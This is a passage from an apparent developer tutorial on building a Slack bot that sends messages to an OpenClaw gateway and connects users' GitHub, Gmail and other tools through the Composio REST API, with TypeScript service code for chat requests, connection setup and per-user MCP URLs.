  &lt;span class="na"&gt;create&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;teamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;authConfigId&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="na"&gt;update&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;authConfigId&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;/list-mcp-configs&lt;/h4&gt;

&lt;p&gt;A simple admin command that lists all registered MCP Configs for the workspace:&lt;/p&gt;

&lt;p&gt;"Engineering" - server:  - toolkits: github, linear&lt;br&gt;
"Sales" - server:  - toolkits: gmail, notion&lt;/p&gt;
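&lt;p&gt;Under the hood this is just a &lt;code&gt;findMany&lt;/code&gt; plus some mrkdwn formatting. A minimal sketch, assuming a row shape like the one registered by &lt;code&gt;/add-mcp-config&lt;/code&gt; (the formatter name is made up):&lt;/p&gt;

```typescript
// Hypothetical formatter for the /list-mcp-configs output shown above.
// Takes rows like those from db.mcpConfig.findMany() and renders one
// Slack mrkdwn line per config.
interface McpConfigRow {
  name: string;
  composioServerId: string;
  toolkitSlugs: string[];
}

function formatMcpConfigs(configs: McpConfigRow[]): string {
  if (configs.length === 0) return "No MCP Configs registered yet.";
  return configs
    .map(
      (c) =>
        `*${c.name}* - server: \`${c.composioServerId}\` - toolkits: ${c.toolkitSlugs.join(", ")}`,
    )
    .join("\n");
}
```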
&lt;h3&gt;Sending Requests to OpenClaw&lt;/h3&gt;

&lt;p&gt;Up until this point, we've been working on the Slack side with a bit of Composio setup. But how do we actually send these messages to OpenClaw?&lt;/p&gt;

&lt;p&gt;OpenClaw exposes an OpenAI-compatible &lt;code&gt;/v1/chat/completions&lt;/code&gt; endpoint. Our service code wraps that with a proper system prompt, conversation history, and error handling. Nothing most of you haven't seen before.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 openclaw.service.ts&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;generateResponse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;gatewayUrl&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;userMessage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;history&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Array&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;role&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nl"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;sessionKey&lt;/span&gt;&lt;span class="p"&gt;?:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;OpenClawResponse&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="na"&gt;systemPrompt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;ChatMessage&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;role&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;system&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;You are a helpful assistant in a Slack workspace. &lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;You have access to the user's connected tools (GitHub, Linear, Gmail, etc.) through Composio. &lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;The user's tools are already connected. Do not ask them to connect or authenticate. &lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Use the available Composio tools directly to answer questions. &lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Be concise. Format responses for Slack (use mrkdwn syntax).&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;};&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="na"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;ChatMessage&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="nx"&gt;systemPrompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nx"&gt;history&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;map&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;m&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="na"&gt;role&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;m&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;role&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;assistant&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;assistant&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;m&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;})),&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;role&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;userMessage&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;];&lt;/span&gt;

  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;sendToOpenClaw&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;gatewayUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;sessionKey&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;We also wrap the raw fetch in a custom &lt;code&gt;OpenClawError&lt;/code&gt; class with error codes for timeouts, auth failures, and gateway errors, the kind of error handling you'd want in any real-world codebase.&lt;/p&gt;
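&lt;p&gt;To make that concrete, here's a trimmed-down sketch of what the error class and gateway call could look like. The request payload shape and status-code mapping are assumptions, not the exact production code:&lt;/p&gt;

```typescript
// Sketch of OpenClawError and the gateway call. The payload fields and
// error mapping below are illustrative assumptions.
class OpenClawError extends Error {
  constructor(
    message: string,
    public readonly code: "TIMEOUT" | "AUTH" | "GATEWAY",
  ) {
    super(message);
    this.name = "OpenClawError";
  }
}

async function sendToOpenClaw(
  gatewayUrl: string,
  gatewayToken: string,
  messages: { role: string; content: string }[],
  sessionKey?: string,
): Promise<{ content: string }> {
  let res: Response;
  try {
    res = await fetch(`${gatewayUrl}/v1/chat/completions`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
        Authorization: `Bearer ${gatewayToken}`,
      },
      body: JSON.stringify({ messages, user: sessionKey }),
      signal: AbortSignal.timeout(120_000),
    });
  } catch {
    // fetch rejects on abort/network failure
    throw new OpenClawError("Gateway did not respond in time", "TIMEOUT");
  }
  if (res.status === 401 || res.status === 403) {
    throw new OpenClawError("Gateway rejected the token", "AUTH");
  }
  if (!res.ok) {
    throw new OpenClawError(`Gateway returned ${res.status}`, "GATEWAY");
  }
  const data = await res.json();
  return { content: data.choices?.[0]?.message?.content ?? "" };
}
```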

&lt;blockquote&gt;
&lt;p&gt;💡 Prefer something built-in like &lt;code&gt;fetch&lt;/code&gt; over a third-party library like &lt;code&gt;axios&lt;/code&gt;, especially after the recent &lt;code&gt;axios&lt;/code&gt; compromise, which affected hundreds of thousands of applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Connecting tools with Composio&lt;/h3&gt;

&lt;p&gt;You might be familiar with Composio through its SDK, &lt;code&gt;@composio/core&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;But you can also talk to its REST API directly. Here, we call the Composio REST API at &lt;code&gt;backend.composio.dev&lt;/code&gt; using an API key from &lt;code&gt;platform.composio.dev&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;There are only three functions in the service, and each one does exactly what the name suggests 🤌&lt;/p&gt;
&lt;h4&gt;Check what a user has connected:&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 composio.service.ts&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;getConnectedToolkits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;apiKey&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;COMPOSIO_API_BASE&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/connected_accounts?user_id=&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nf"&gt;encodeURIComponent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;method&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;GET&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;x-api-key&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;apiKey&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="na"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;AbortSignal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;timeout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="nx"&gt;_000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;items&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;filter&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;account&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;account&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ACTIVE&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;map&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;account&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;account&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toolkit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;slug&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;Initiate a new connection:&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 composio.service.ts&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;initiateConnection&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;apiKey&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;authConfigId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;COMPOSIO_API_BASE&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/connected_accounts`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;method&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;POST&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Content-Type&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;application/json&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;x-api-key&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;apiKey&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="na"&gt;body&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="na"&gt;auth_config&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;authConfigId&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="na"&gt;connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;slackUserId&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;}),&lt;/span&gt;
    &lt;span class="na"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;AbortSignal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;timeout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="nx"&gt;_000&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;redirect_url&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Build the per-user MCP URL:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 composio.service.ts&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;getMcpUrl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;composioServerId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;`https://backend.composio.dev/v3/mcp/&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;composioServerId&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/mcp?user_id=&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nf"&gt;encodeURIComponent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This last one is the most important. There's no API call; it's pure URL construction. But this URL is what ties everything together: the &lt;code&gt;composioServerId&lt;/code&gt; controls which toolkits are available, and the &lt;code&gt;user_id&lt;/code&gt; scopes which credentials are used. When &lt;code&gt;/assign&lt;/code&gt; runs, it computes this URL and shows it to the admin so they can configure it in the user's OpenClaw instance.&lt;/p&gt;
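&lt;p&gt;As a quick usage sketch, here is that computation end to end (the server and user IDs are made up; &lt;code&gt;getMcpUrl&lt;/code&gt; is repeated from above so the snippet is self-contained):&lt;/p&gt;

```typescript
// getMcpUrl, repeated from above so this snippet stands alone.
function getMcpUrl(composioServerId: string, slackUserId: string): string {
  const encoded = encodeURIComponent(slackUserId);
  return `https://backend.composio.dev/v3/mcp/${composioServerId}/mcp?user_id=${encoded}`;
}

// What /assign would show the admin for a made-up user and server:
const url = getMcpUrl("srv_123", "U012AB3CD");
// url === "https://backend.composio.dev/v3/mcp/srv_123/mcp?user_id=U012AB3CD"
```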
&lt;h3&gt;
  
  
  Persisting Users and Conversations
&lt;/h3&gt;

&lt;p&gt;Every Slack user that messages the bot gets a record in our database, keyed on the (&lt;code&gt;slackUserId&lt;/code&gt;, &lt;code&gt;slackTeamId&lt;/code&gt;) pair. This is a safety net, as the same Slack user ID could theoretically exist across different workspaces.&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 slack-user.service.ts&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;resolveSlackUser&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;existing&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;slackUser&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;findUnique&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
